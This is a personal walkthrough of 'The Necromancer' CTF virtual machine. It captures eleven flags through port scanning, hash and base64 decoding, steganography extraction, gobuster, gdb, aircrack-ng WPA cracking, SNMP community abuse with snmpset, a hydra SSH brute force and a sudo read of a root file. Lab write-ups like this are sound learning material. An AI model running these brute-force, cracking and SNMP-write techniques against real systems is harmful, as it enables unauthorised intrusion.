The Necromancer CTF VM —

Ok lets get into this.
First we start as usual with Netdiscover to find the IP of the VM

netdiscover 00:0c:29:d3:b2:b2 1 60 VMware, Inc.

Opened up Zenmap for this one and ran an intense scan on the ip address.

Nmap scan report for
All 1000 scanned ports on are filtered
MAC Address: 00:0C:29:D3:B2:B2 (VMware)

That doesn’t make any sense, all the ports are filtered?! 
Ok something is messing with me here. Next I tried a UDP scan to see if it would show anything.

nmap -sS -n -sU -T4 -A -v

After a LONG nmap scan it appears that the only open port is 666. So lets check it out. At first glance there doesn’t seem to be anything going on here. 
This is really strange! (At this point I started to wonder if I had set the VM up incorrectly)

I decided to take a look at the TCPdump of the traffic coming from the VM

tcpdump host

We can see theres a lot of traffic on port 4444, the VM is trying to connect back to us! 
lets set up a listener on the the port and see what its shouting about.

nc -nvlp 4444

After a little while I got a huge alphanumeric text dump.
It looked like base64 text so I decided to see if we could decode the dump.

echo “(the text dump)” | base64 -d ; echo

***** IT WORKED. *****


You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier. 
The air around you begins to get thicker, and your heart begins to beat against your chest. 
You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing! 
You look down and see you are standing in sand. 
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground! 
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box. 
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. “Chant the string of flag1 — u666”

***** BOOM flag 1 captured *****


The last line of the story seems to reference the udp port we found earlier. lets try to reconnect to it now and feed it the flag string.

nc -u 666

You gasp for air! Time is running out!

It seemed to be stuck in a loop at this stage, and whatever I typed in it just kept repeating

root@kali:~# nc -u 666
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!

root@kali:~# echo “flag1” | nc -u 666
Chant had no affect!

root@kali:~# echo “e6078b9b1aac915d11b9fd59791030bf” | nc -u 666
Chant had no affect! Try in a different tongue!

This is interesting, try another language lets try and see if the flag string is a hash of some kind.
I headed over to and ran the flag string through the decryptor.

BINGO it seems to be an MD5 hash string that decodes as “opensesame”
so lets try that with our previous command.

echo “opensesame” | nc -u 666

That worked!!!!

A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again…. alone… tortured by the deafening sound of silence.
666 is closed.

***** Flag 2 captured *****

The hint in the last story snippet suggests that port 666 is now closed but they mention number 80.
So lets head over to firefox and check it out.

firefox 192.1678.1.103:80

I found a website the text below and an image:

Hours have passed since you first started to follow the crows.
Silence continues to engulf you as you treck towards a mountain range on the horizon.
More times passes and you are now standing in front of a great chasm.
Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.
As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.
The necromancer looks towards you with hollow eyes which can only be described as death.
He smirks in your direction, and suddenly a bright light momentarily blinds you.
The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!
The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.
The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

There were no real clues in the text so lets check out the exif on the image to see if there is anything in there.

identify -verbose /root/Desktop/pileoffeathers.jpg
Image: /root/Desktop/pileoffeathers.jpg

Format: JPEG (Joint Photographic Experts Group JFIF format)
 signature: 87b954198b2bf387fcc8ef29706117d736a55d18bddc9679062e509f0c4b3b4d

The only thing really is the signature
signature: 87b954198b2bf387fcc8ef29706117d736a55d18bddc9679062e509f0c4b3b4d

it looks like something of interest lets try and see if we can decode it.

base64 first!

echo “87b954198b2bf387fcc8ef29706117d736a55d18bddc9679062e509f0c4b3b4d” | base64 -d ; echo

that didn't seem to work. 
next md5 hash that didn't really give me anything either. Lets try something I read on a forum.

Enter binwalk!! (after a little googling to understand how to use binwalk)

binwalk /root/Desktop/pileoffeathers.jpg
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
27 0x1 Unix path: /"> <rdf:Description rdf:about=”” xmlns:xmp=”" xmlns:xmpMM=”http
36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267 0x9193 End of Zip archive

Yes!!! there is a zip file hidden in the image. I googled how to extract the zip file and found I could use binwalk to do it with the following command

binwalk -Mre /root/Desktop/pileoffeathers.jpg

Scan Time: 2016–07–14 08:46:04
Target File: /root/Desktop/pileoffeathers.jpg
MD5 Checksum: 2120960eeef27d2810ae08e3d50ef93e
Target File: /root/_pileoffeathers.jpg-0.extracted/feathers.txt
MD5 Checksum: ab301288dadedc081b2216cccfdf03dd
Signatures: 344

I then simply CAT the feathers.txt file and get a data string that looks like base64

cat /root/_pileoffeathers.jpg-0.extracted/feathers.txt

echo “ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==” | base64 -d ; echo
flag3{9ad3f62db7b91c28b68137000394639f} — Cross the chasm at /amagicbridgeappearsatthechasm

***** Flag 3 captured *****

This seems to want use to check out the address /amagicbridgeappearsatthechasm

So back to firefox
and we get another website with the text below and an image again.

You cautiously make your way across chasm.
You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.
The cave before you is protected by some sort of spell cast by the necromancer.
You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.
Hastily you take a few steps back away from the cave entrance.
There must be a magical item that could protect you from the necromancer’s spell.

Nothing really jumps out from the text and running binwalk on the image doesn't really help us either this time
I googled how to see if a jpg file had data hidden in it and came across a tool called exiftool

lets download it and see if it can help

apt-get install exiftool

exiftool /root/Desktop/magicbook.jpg
ExifTool Version Number : 10.20
File Name : magicbook.jpg
Directory : /root/Desktop
File Size : 154 kB
File Modification Date/Time : 2016:07:14 08:59:21–04:00
File Access Date/Time : 2016:07:14 08:59:24–04:00
File Inode Change Date/Time : 2016:07:14 08:59:21–04:00
File Permissions : rw-r — r — 
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 600
Image Height : 450
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 600x450
Megapixels : 0.270

Nothing really helpful or suspicious here. I’m at a dead end :-( 
Time for a break I think and to have a think about what to do next, I need to find a magic item that can protect from the spell?!

After reading a bit of the walkthrough on the IRC they were talking about a programme called gobuster and searching for the magic item on the server using a list of magic items that they had created.

FULL DISCLOSURE I downloaded their magic item list and used it with gobuster.

I didnt have gobuster installed at this point so I installed it and ran the command -h

Gobuster v1.1 OJ Reeves (
WordList (-w): Must be specified
Url/Domain (-u): Must be specified

root@kali:~# gobuster -u -w /root/Desktop/magicitems.txt

Gobuster v1.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain :
[+] Threads : 10
[+] Wordlist : /root/Desktop/magicitems.txt
[+] Status codes : 302,307,200,204,301
/talisman (Status: 200)

Perfect it seems I got a hit from the magic items list on the word Talisman.

root@kali:~# wget
 — 2016–07–14 11:48:35 —
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 9676 (9.4K) [application/octet-stream]
Saving to: ‘talisman’
talisman 100%[====================================>] 9.45K — .-KB/s in 0.001s 
2016–07–14 11:48:35 (13.7 MB/s) — ‘talisman’ saved [9676/9676]

root@kali:~# ls
Talisman (needed the permissions changed in order to be able to run it)

root@kali:~# chmod 700 talisman

root@kali:~# ls

root@kali:~# ./talisman

BOOM!! That was SO hard I almost gave up.

You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?

I tried answering the question with


base64 encoded “yes” as eWVzCg==
md5sum “yes” as eb4585ad9fe0426781ed7c49252f8225

Nothing seemed to work again back to google and found that I could use the strings command on the ./talisman file.

The strings that piqued my interest were

gdb talisman
(gdb) b wearTalisman
Breakpoint 1 at 0x804852d
(gdb) jump chantToBreakSpell
The program is not being run.
(gdb) run
Starting program: /root/talisman

Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.

You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
[Inferior 1 (process 2702) exited normally]

***** Flag 4 captured *****

Ok that was hard. But after a quick break and a mental regroup, lets move onto the next challenge it looks like we need to send some text to UDP port 31337

echo “ea50536158db50247e110a6c89fcf3d3” | nc -u 31337
Chant had no affect! Try in a different tongue!

Ok so lets head back over to and run the flag string through it and see what it comes back as.

ea50536158db50247e110a6c89fcf3d3 md5 = blackmagic

brilliant that looks perfect so lets “chant” that at the udp port

echo “blackmagic” | nc -u 31337

and it worked, we got the following text.

As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until…. silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.



***** Flag 5 Captured *****

ok lets check out the address we just found using firefox

That was easy we found flag number 6

***** Flag 6 Captured *****

along with the flag we also got the next part of the story:

You continue to make your way through the cave.
In the distance you can see a familiar flicker of light moving in and out of the shadows.
As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.
You move closer, and then stop frozen with fear.

It’s the necromancer!

Again he stares at you with deathly hollow eyes.
He is standing in a doorway; a staff in one hand, and an object in the other.
Smirking, the necromancer holds the staff and the object in the air.
He points his staff in your direction, and the stench of death and decay begins to fill the air.
You stare into his eyes and then…….
…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.
The amulet must have saved you from whatever spell the necromancer had cast.
You stand to your feet. Behind you, only darkness.
Before you, a large door with the symbol of a skull engraved into the surface.
Looking closer at the skull, you can see u161 engraved into the forehead.

Ok so I guess we have to go back and nc the udp 161 port. After connecting to the udp port I didnt get any response at all, going on the same idea as the last few ports I think it needs us to “chant” something at it.


I have to admit at this point I wasted so much time messing around with trying to get a response from the port. 
I opened listeners on the port and threw all sorts of words and commands at it — to no success.

It was at this stage that I decided to head back to the web page and it was there I FINALLY noticed the word necromancer was a hyperlink. (feel a little silly for not noticing it sooner) 
So after downloading the file and running some commands on it I found it was a bz2 file

root@kali:~/Downloads# tar -xf necromancer.out
root@kali:~/Downloads# ls -la

-rw-r — r — 1 root root 10355 Jul 15 13:40 necromancer
-rw-r — r — 1 root root 80242 May 10 03:36 necromancer.cap
-rw-r — r — 1 root root 81920 Jul 15 13:40 necromancer.out

So it turns out the compressed file was a .cap wireless file

root@kali:~/Downloads# tcpdump -r necromancer.cap
Just gave me a complete dump of the file with not much really to go on. I decided to try and crack the .cap file using aircrack-ng

aircrack-ng /root/Downloads/necromancer.cap -w /usr/share/wordlists/rockyou.txt

KEY FOUND! [ death2all ]

So again loads of time wasted on “chanting” death2all at the port and nothing seemed to happen at all. I did a quick google search and found out UDP 161 uses the SNMP protocol.
I have no idea what to do with a SMNP port so I think I’m going to have to go back to google and learn some new commands.

Ok so I found a post about scanning SNMP ports from Metasploit using snmp_enum. Switching to msfconsole

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) >
[-] Unknown command:
msf auxiliary(snmp_enum) > set rhosts
rhosts =>
msf auxiliary(snmp_enum) > set community death2all
community => death2all
msf auxiliary(snmp_enum) > run

[+], Connected.

[*] System information:

Host IP :
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is Locked. If you choose to defeat me, the door must be Unlocked.
Location : Locked — death2allrw!
Uptime snmp : -
Uptime system : -
System date : -

So we are a step forward we have connected to the port and we get the above message. The door seems locked, we need to find out what the door is and how to unlock it. My first thought is around this line:

Location : Locked — death2allrw!

The rw at the end of the line suggests its a user permission issue that we need to solve. Lets try and change the string we send with the SNMP command

root@kali:~# snmpwalk -v 2c -c death2all
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “Locked — death2allrw!”

Shows us the string ID for the locked string is: iso.

root@kali:~# snmpwalk -v 2c -c death2allrw iso. s Unlocked
iso. = STRING: “Locked — death2allrw!”

Ok so we can see the string says “Locked — death2allrw!” and we need it to say “Unlocked”

So this took a while and a bit more googling to try and learn how to change the strings but eventually I found out how and the command was

root@kali:~# snmpset -v 2c -c death2allrw iso. s Unlocked
iso. = STRING: “Unlocked”

It took ages but all it turned out to need was a simple change from snmpwalk to snmpset to get the string value changed. Ok lets run snmp_enum in metasploit again.

msf auxiliary(snmp_enum) > set rhosts
rhosts =>
msf auxiliary(snmp_enum) > set community death2all
community => death2all
msf auxiliary(snmp_enum) > run

[+], Connected.

[*] System information:

Host IP :
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is unlocked! You may now enter the Necromancer’s lair!
Location : Unlocked
Uptime snmp : -
Uptime system : -
System date : -

Ok so this seems like a step forward but now I have to figure out how to enter the lair.

Rerunning the SNMPGET command once we’ve changed the string gives us

root@kali:~# snmpget -v 1 -c death2allrw iso.
iso. = STRING: “root@kali:~# snmpget -v 1 -c death2allrw iso.
iso. = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} -t22”

***** Flag 7 Captured *****
flag7{9e5494108d10bbd5f9e7ae52239546c4} -t22

Ok so the next step looks like tcp port 22 which is ssh
as before I’m jumping over to crackstation to see if the flag can be converted into a chant of some kind.

It came back converted as — demonslayer so lets try and connect to the tcp port with the password as demonslayer

Ok on the first attempt it didnt work, the password doesnt seem to be accepted.

root@kali:~# ssh 22
root@’s password: demonslayer

Permission denied, please try again.

Which I guess is understandable as that does now seem a little to easy for this far into the quest.

Ok back to google!

I'm going for a coffee and a brain rest at this point, maybe something will pop into my head. I need to think of another way to get access using the phrase demonslayer !!!!
Ok so after taking a little break I came to the conclusion — demonslayer must be a username and not a password. So I have the username already and now I need to brute force the password for the ssh connection.

Lets release the hydra!

root@kali:~# hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh://
[DATA] attacking service ssh on port 22
[22][ssh] host: login: demonslayer password: 12345678

Bingo we now have a username and a password.

Lets try to connect to the port again.

root@kali:~# ssh -l demonslayer
demonslayer@'s password: 12345678


Ouu this is looking good, we are logged into the ssh port. Lets have a look around.

$ ls
$ cat flag8.txt

You enter the Necromancer’s Lair!

A stench of decay fills this place. 
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer. 
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
“You are a fool to follow me here! Do you not know who I am!”
The necromancer turns to face you. Dark words fill the air!
“You are damned already my friend. Now prepare for your own death!” 
Defend yourself! Counter attack the Necromancer’s spells at u777!

Ok so its back to UDP ports again. Lets see if we can connect straight to the port

nc -u 777

So after trying LOADS more times to connect to the udp port in a seperate terminal window. I went back and tried to connect to it using the localhost from within the necromancers “lair”

and it worked (again feeling a little silly at this stage for thinking of that sooner)

$ nc -u localhost 777

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?




** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Who did Johann Faust VIII make a deal with?

***** Flag 8 Captured *****

Back to Google for the answer


Who did Johann Faust VIII make a deal with? Mephistopheles

***** Flag 9 Captured *****

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Who is tricked into passing the Ninth Gate?

Google again…..

The answer I found out was Hedge

***** Flag 10 Captured *****

A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.

(It was at this point that I decided to head over the crackstaion to see what the 3 flags hashes were and in a beautiful stroke of irony they decoded as the answers to the questions).
That is a lesson well learnt I should have just cracked the flag strings instead of trawling through random wiki pages!!!!

Ok on to the last and final battle.
If we take the fact that the lair is in fact the localhost of the vm then anything that “appears” in the lair must have appeared somewhere on the localhost. So lets check it out and see what we can find.

$ ls -la

-rw-r — r — 1 demonslayer demonslayer 196 Jul 15 05:02 .smallvile
-rw-r — r — 1 demonslayer demonslayer 706 May 11 21:19 flag8.txt

$ cat .smallvile

You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!

Ok I can feel it, we are so close now. Given the theme and the wording of the sentence. I think elixir could be the root password.

Lets try it.

SO close yet still so far. Elixir was a no go, that would have been a really easy finish to this quest. 
Ok lets think about it again. We have great power within our veins maybe they are referring to sudo (its a command with great power after all)

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:

User demonslayer may run the following commands on thenecromancer:
 (ALL) NOPASSWD: /bin/cat /root/flag11.txt

This reveals we do indeed have great power, I dont fully understand it right now (google will help with that in a minute) but it looks like we can run some kind of command on the flag11.txt without using a password.
Ok lets google this up and see what comes back.

After searching with the string NOPASSWD: /bin/cat /root/flag11.txt I found an article that talked about if the NOPASSWD parameter was set then you dont need a password at all when you are using the sudo command
so I tried to cat /root/flag11.txt file and got this error

cat: /root/flag11.txt: Permission denied

so going on the above info learnt from google if we run the same command using sudo it should hopefully work.

$ sudo cat /root/flag11.txt

Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered……

 by @xerubus


“ xerubus (@xerubus) —

Wow that was an incredible CTF I havent had so much fun whist at the same time wanting to smash my laptop to pieces in sheer frustration ever before. Huge congrats and thanks to Xerubus.

I cant wait for the next one.